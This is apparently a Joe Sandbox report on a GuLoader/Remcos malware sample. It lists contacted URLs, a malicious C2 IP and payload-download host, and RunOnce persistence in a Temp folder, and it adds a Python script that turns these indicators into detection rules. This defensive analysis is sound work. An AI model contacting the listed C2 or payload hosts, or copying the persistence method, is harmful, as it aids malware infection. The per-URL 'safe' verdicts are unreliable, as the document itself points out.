              https://2542116.fls.doublecli | wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              https://servedby.flashtalking.com/imp/8/106228;3700839;201;jsiframe;Adobe;1000x463DESKTOPACROBATREAD | wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117826187.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117417668.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12118733760.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117107256.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117029806.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117702946.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12118480673.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://adservice.google.co. | wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              https://odc.offi | wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              http://www.imvu.comr | wab.exe, 00000002.00000002.16935529143.0000000037530000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000006.00000002.12095725931.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211 | wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://eb2.3lift.com/sync | wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://go.microsoft.co | wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              https://contextual.media.net/check | wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://www.msn.com/de-ch/https:// | wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://eb2.3lift.com/sync? | wab.exe, 00000004.00000003.12115362208.0000000004EC1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://support.google.com/chrome/?p=plugin_flash | wab.exe, 00000004.00000003.12124781462.00000000046D1000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://googleads.g.doubleclick.net/pagea | wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://www.msn.com/?ocid=ie | wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmp | false | | high
              http://www.nirsoft.net | wab.exe, 00000004.00000002.12129302860.000000000059B000.00000004.00000010.00020000.00000000.sdmp | false | | high
              http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | wab.exe, 00000002.00000002.16935529143.0000000037530000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000006.00000002.12095725931.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              http://geoplugin.net/json.gpEd | wab.exe, 00000002.00000002.16922298263.0000000006B51000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              https://www.google.com/recaptcha/api2/aframe | wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmp | false | | high
              http://kapsnovin.com/KvGfOfeyMpEaqpzI164.bin_ | wab.exe, 00000002.00000002.16922298263.0000000006B16000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              https://www.google.com/chrome/ | wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://www.google.com | wab.exe, wab.exe, 00000006.00000002.12095725931.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | | high
              https://www.google.com/recaptcha/api | wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7209567 | wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3739368433491;gt | wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              http://kapsnovin.com/KvGfOfeyMpEaqpzI164.binJ | wab.exe, 00000002.00000002.16922298263.0000000006B16000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2 | wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://odc.officeap | wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              https://www.google.com/chrome/https:// | wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://www.google.com/pa | wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211https://googleads.g.doubleclick.net/page | wab.exe, 00000004.00000003.12118574079.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117762141.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12118538217.00000000046CD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12118680474.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117950906.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12118788842.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117881357.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12118627581.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117642956.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12127760939.00000000046C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117504774.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12118010524.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117826187.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12118733760.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117702946.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12118480673.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://2542116.fls.doubleclick.net/activ | wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmp | false | | high
              http://kapsnovin.com/KvGfOfeyMpEaqpzI164.binMillIntunif-pid.com/KvGfOfeyMpEaqpzI164.bin | wab.exe, 00000002.00000002.16934552268.00000000364B0000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              https://2542116.fls.doub | wab.exe, 00000004.00000003.12123400386.00000000046DA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              https://2542116.fls.double | wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              https://www.msn.com/https://www.msn.com/de-c | wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://login.yahoo.com/config/login | wab.exe | false | | high
              https://www.msn.com/de-ch/?ocid=iehp | wab.exe, 00000004.00000003.12115114712.00000000046C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmp | false | | high
              http://geoplugin.net/json.gpn.net/son.gpp.dll | wab.exe, 00000002.00000002.16922298263.0000000006B16000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0 | wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmp | false | | high
              http://www.nirsoft.net/ | wab.exe, 00000006.00000002.12095725931.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | | high
              http://www.imvu.comata | wab.exe, 00000006.00000002.12096878380.000000000312D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              https://www.msn.com/spartan/ientp?locale=en-GB&market=GB&enableregulatorypsm=0&enablecpsm=0&NTLogo=1 | wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=37393684334 | wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12123198637.00000000046DA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12119839410.00000000046D1000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://contextual.med | wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3739368433491;gtm= | wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://www.google.com/pagead/drt/ui | wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://2542116.fls.doubleclick.net/activi | wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmp | false | | high
              http://geoplugin.net/json.gpmd | wab.exe, 00000002.00000002.16922298263.0000000006B51000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              https://capturemedia-assets.com/ig-bank/ad-engagement/startAnimation/main/index.html | wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmp | false
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://www.imvu.com/wab.exe, 00000006.00000002.12095990427.000000000078C000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://geoplugin.net/json.gplwab.exe, 00000002.00000002.16922298263.0000000006B51000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://eb2.3lifwab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  low
                                                                                  https://get.awab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://geoplugin.net/json.gphxwab.exe, 00000002.00000002.16922298263.0000000006B51000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://www.imvu.comwab.exe, wab.exe, 00000006.00000002.12095725931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000006.00000002.12096878380.000000000312D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://contextual.media.net/checkswab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://2542116.fls.doubXXOwab.exe, 00000004.00000003.12123467111.00000000046DA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12123597367.00000000046DA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12123700609.00000000046DC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        http://nsis.sf.net/NSIS_ErrorErrorSMGS-RCDU5010031.exefalse
                                                                                          high
                                                                                          https://get3.adobewab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://www.msn.com/spartan/ientpwab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://acdn.adnxs.com/dmp/async_usersync.html?gdpr=1&gdpr_consent=CPM7kC1PM7kC1AcABBENBQCsAP_AAELAAwab.exe, 00000004.00000003.12117762141.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117950906.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117881357.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117642956.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117504774.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12118010524.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117826187.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117417668.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12119500072.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117702946.0000000004EC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chrom0;ord=8672137916610;wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://www.msn.com/?ocid=iehpwab.exe, 00000004.00000003.12115114712.00000000046C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://geoplugin.net/wab.exe, 00000002.00000002.16922298263.0000000006B2B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://ib.adnxs.com/async_usersync_filewab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://www.google.com/accounts/serviceloginwab.exefalse
                                                                                                        high
                                                                                                        https://googleads.g.doubleclick.net/pagead/ads?gdpr=1&gdpr_consent=CPM7kC1PM7kC1AcABBENBQCsAP_AAELAAwab.exe, 00000004.00000003.12119500072.0000000004EC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://contextual.media.net/checksync.phpwab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://kapsnovin.com/KvGfOfeyMpEaqpzI164.binywab.exe, 00000002.00000002.16922298263.0000000006B16000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://contextual.mediwab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://get3.adobe.cowab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://tpc.gwab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            http://www.ebuddy.comwab.exe, wab.exe, 00000006.00000002.12095725931.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
IP | Domain | Country | ASN | ASN Name | Malicious
94.156.6.253 | unknown | Bulgaria | 43561 | NET1-ASBG | true
77.238.121.250 | kapsnovin.com | Iran (Islamic Republic of) | 43754 | ASIATECHIR | true
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
                                                                                                            Joe Sandbox Version:38.0.0 Ammolite
                                                                                                            Analysis ID:1330791
                                                                                                            Start date and time:2023-10-23 20:37:25 +02:00
                                                                                                            Joe Sandbox Product:CloudBasic
                                                                                                            Overall analysis duration:0h 17m 22s
                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                            Report type:full
                                                                                                            Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301)
Run name:Suspected Instruction Hammering
Number of new started processes analysed:7
                                                                                                            Number of new started drivers analysed:0
                                                                                                            Number of existing processes analysed:0
                                                                                                            Number of existing drivers analysed:0
                                                                                                            Number of injected processes analysed:0
                                                                                                            Technologies:
                                                                                                            • HCA enabled
                                                                                                            • EGA enabled
                                                                                                            • AMSI enabled
                                                                                                            Analysis Mode:default
                                                                                                            Analysis stop reason:Timeout
                                                                                                            Sample file name:SMGS-RCDU5010031.exe
                                                                                                            Detection:MAL
                                                                                                            Classification:mal100.phis.troj.spyw.evad.winEXE@9/32@3/3
                                                                                                            EGA Information:
                                                                                                            • Successful, ratio: 100%
                                                                                                            HCA Information:
                                                                                                            • Successful, ratio: 97%
                                                                                                            • Number of executed functions: 171
                                                                                                            • Number of non-executed functions: 338
                                                                                                            Cookbook Comments:
                                                                                                            • Found application associated with file extension: .exe
                                                                                                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe
                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                            • VT rate limit hit for: SMGS-RCDU5010031.exe
Time | Type | Description
19:39:36 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Telefonvsenet C:\Users\user\AppData\Local\Temp\Skyggelgningen\Etpartisystemers.exe
19:39:45 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Telefonvsenet C:\Users\user\AppData\Local\Temp\Skyggelgningen\Etpartisystemers.exe
20:40:15 | API Interceptor | 46335724x Sleep call for process: wab.exe modified
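The IP table above and the two RunOnce entries in the timeline are the parts of this report a defender can act on directly: a C2 address (94.156.6.253) and the GuLoader payload host (kapsnovin.com, 77.238.121.250) are both marked malicious, geoplugin.net is a legitimate geolocation service that Remcos queries at start-up and is listed as not malicious, and persistence is a RunOnce value whose target sits under %LOCALAPPDATA%\Temp. Note that the URL table lists http://kapsnovin.com/KvGfOfeyMpEaqpzI164.bin with "Malicious: false" and "Avira URL Cloud: safe" while the IP table flags its host as malicious, so the per-URL verdict should not be taken at face value. The following is an added example, not part of the Joe Sandbox report, that turns those observations into a small detection pass over constructed proxy-log lines and registry autorun entries. The log line format, timestamps, client address and C2 port are assumptions; hosts, paths and registry values are the ones the report lists. The ".bin over plain HTTP with no User-Agent" rule generalises beyond the single URL on the page, based on the report's "HTTP GET or POST without a user agent" signature.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple
from urllib.parse import urlsplit

# Network indicators copied from the report's IP and URL tables.
C2_IPS = {"94.156.6.253"}        # Malicious: true in the IP table, no domain resolved
STAGE_HOSTS = {"kapsnovin.com"}   # 77.238.121.250, host of KvGfOfeyMpEaqpzI164.bin
GEO_HOSTS = {"geoplugin.net"}     # legitimate geolocation API, listed as not malicious

# Persistence indicator from the timeline: a Run/RunOnce value whose target lives
# under %LOCALAPPDATA%\Temp. The HKCU and HKCU64 keys end in the same subkey.
AUTORUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(Once)?$", re.IGNORECASE)
TEMP_TARGET_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)

# Constructed proxy-log line format (an assumption, not a Joe Sandbox artefact):
#   <timestamp> <client> <method> <url-or-host[:port]> ua="<user agent>"
PROXY_RE = re.compile(
    r'^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<dest>\S+) ua="(?P<ua>[^"]*)"$'
)


@dataclass(frozen=True)
class Finding:
    severity: str   # "high" or "medium"
    rule: str
    evidence: str


def dest_host(dest: str) -> str:
    """Host part of a URL or of a bare host[:port] destination (IPv4/DNS only)."""
    if "://" in dest:
        return (urlsplit(dest).hostname or "").lower()
    return dest.rsplit(":", 1)[0].lower()


def classify_http(line: str) -> Optional[Finding]:
    """Return a Finding for one proxy-log line, or None if nothing matches."""
    m = PROXY_RE.match(line.strip())
    if not m:
        return None
    dest, ua = m.group("dest"), m.group("ua")
    host = dest_host(dest)
    if host in C2_IPS:
        return Finding("high", "c2_ip", f"{host} is flagged malicious in the report")
    if "://" not in dest:
        return None
    parts = urlsplit(dest)
    if host in STAGE_HOSTS:
        return Finding("high", "guloader_stage_host", f"payload host {host}: {dest}")
    # Generalisation beyond the one URL on the page: GuLoader pulls its encrypted
    # stage as a .bin over plain HTTP, and the sandbox noted GETs without a User-Agent.
    if parts.scheme == "http" and parts.path.lower().endswith(".bin") and ua in ("", "-"):
        return Finding("high", "bare_bin_download", f"no User-Agent GET of {dest}")
    if host in GEO_HOSTS and parts.path == "/json.gp":
        return Finding("medium", "geoplugin_lookup",
                       "geoplugin.net/json.gp: benign service that Remcos queries at start-up")
    return None


def classify_autorun(key: str, value_name: str, data: str) -> Optional[Finding]:
    """Flag Run/RunOnce values that launch something from %LOCALAPPDATA%\\Temp."""
    if AUTORUN_KEY_RE.search(key) and TEMP_TARGET_RE.search(data):
        return Finding("high", "runonce_from_temp", f"{key}\\{value_name} -> {data}")
    return None


def scan(proxy_lines: Iterable[str],
         autorun_entries: Iterable[Tuple[str, str, str]]) -> List[Finding]:
    findings = [f for f in map(classify_http, proxy_lines) if f]
    findings += [f for f in (classify_autorun(*e) for e in autorun_entries) if f]
    return findings


# Constructed sample input. Hosts, paths and registry values are the ones the report
# lists; timestamps, the client address and the C2 port are made up.
SAMPLE_PROXY = [
    '2023-10-23T19:39:12 10.0.0.5 GET http://kapsnovin.com/KvGfOfeyMpEaqpzI164.bin ua="-"',
    '2023-10-23T19:39:40 10.0.0.5 GET http://geoplugin.net/json.gp ua="-"',
    '2023-10-23T19:39:41 10.0.0.5 CONNECT 94.156.6.253:2404 ua="-"',
    '2023-10-23T19:40:02 10.0.0.5 GET https://www.msn.com/?ocid=iehp ua="Mozilla/5.0"',
]
SAMPLE_AUTORUNS = [
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce", "Telefonvsenet",
     r"C:\Users\user\AppData\Local\Temp\Skyggelgningen\Etpartisystemers.exe"),
    (r"HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", "Telefonvsenet",
     r"C:\Users\user\AppData\Local\Temp\Skyggelgningen\Etpartisystemers.exe"),
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "OneDrive",
     r"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe"),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_PROXY, SAMPLE_AUTORUNS):
        print(f"[{f.severity}] {f.rule}: {f.evidence}")
```

The geoplugin rule is deliberately only "medium": the similar-samples table shows geoplugin.net/json.gp reused across GuLoader, DBatLoader and plain Remcos submissions, but the service itself is benign and blocking it would break legitimate software; it is useful as a correlating signal next to the RunOnce-from-Temp or payload-host hits, not on its own.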
Match | Associated Sample Name / URL | Detection | Threat Name | Context

Match: 94.156.6.253 (all listed samples: detection malicious, threat name GuLoader, Remcos)
• SecuriteInfo.com.W32.Trojan.SLJK-2619.17130.29308.exe
• PSID_CA_0338-2023-24.exe
• RC_S23_3274 Or_amento ADP 231019_5_5009.exe
• 23IK-1799-REF09NSEP-GERMAMY-TBILIS.exe
• booking_#U0414#U043e#U043c#U043e#U0434#U0435#U0434#U043e#U0432#U043e_-_Price_2_Trucks_EURO_TRUCK.exe
• SirtakiQuote No 104-346.exe
• 2023.10.11.59363PR69186_1.exe
• CMR CA4653XT -10-10-2023-7.exe
• SirtakiQuote_No_104-346.exe
• vxJjLEvhQU.exe
• Or_amento_ARSENAL_260921_5_4808.exe
• #U041a#U043e#U043d#U0442#U0440#U0430#U043a#U0442_#U2116_OX-SOC_150923_FOB.exe
• FACTURE_A23.4618_NOUVELLE_MATURITE.scr.exe
• VLLC2023-0135_Procurment_CJSC05.09.2023.exe
• rEncomendaFornecedor1059.exe
• ERK_M#U00dcH.-12730-0509.exe
• DHL_PRENDAS_Pre-Embarque_32PM4433.scr.exe
• rAUGORDER-INV21100351192110035120-EXPDOC#U00b4s.scr.exe
• R60-2000-NL1-15.27_(ZSW).exe

